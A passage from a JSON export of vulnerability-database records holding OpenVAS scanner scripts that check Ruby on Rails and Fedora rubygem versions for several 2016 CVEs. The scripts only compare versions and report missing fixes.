script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2097\");\n script_bugtraq_id(83726);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 20:09:25 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of\n crafted requests to action view, one of the components of action pack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to read arbitrary files by leveraging an application's unrestricted\n use of the render method.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T21:55:40", "description": "This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2097"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809355", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809355", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809355\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2097\");\n script_bugtraq_id(83726);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 17:09:25 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of\n crafted requests to action view, one of the components of action pack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to read arbitrary files by leveraging an application's unrestricted\n use of the render method.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version:\"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-97002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807435", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-97002\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807435\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:53 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2016-0752\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-97002\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-97002\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178069.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.3~3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activejob FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activejob FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872008\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:24:00 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activejob FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activejob'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activejob on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R67FRLEDPZRRVMJS3A5LA6YIM5UQO4GY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activejob\", rpm:\"rubygem-activejob~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871965", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871965", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871965\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:49 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activesupport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activesupport on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRQYAVBWV4UNQ5XC3LB5L44OYTI3JZ3W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activesupport\", rpm:\"rubygem-activesupport~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872038", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872038", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872038\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:19 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activemodel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activemodel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JNY6ZLXQZ4GJM4L5Z2JD42S4WMYF75U5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activemodel\", rpm:\"rubygem-activemodel~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872047", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872047", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872047\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:34 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activerecord'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activerecord on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5VQDB7AQ3WT2TSLDMYPYKXIMBJ7KYSJ6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activerecord\", rpm:\"rubygem-activerecord~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872011", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872011\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:24:06 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actioncable'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actioncable on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XOQL7IU7SB6QJRWGKCHRPZQUOIURV63S\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actioncable\", rpm:\"rubygem-actioncable~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872094", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872094\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:14 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n 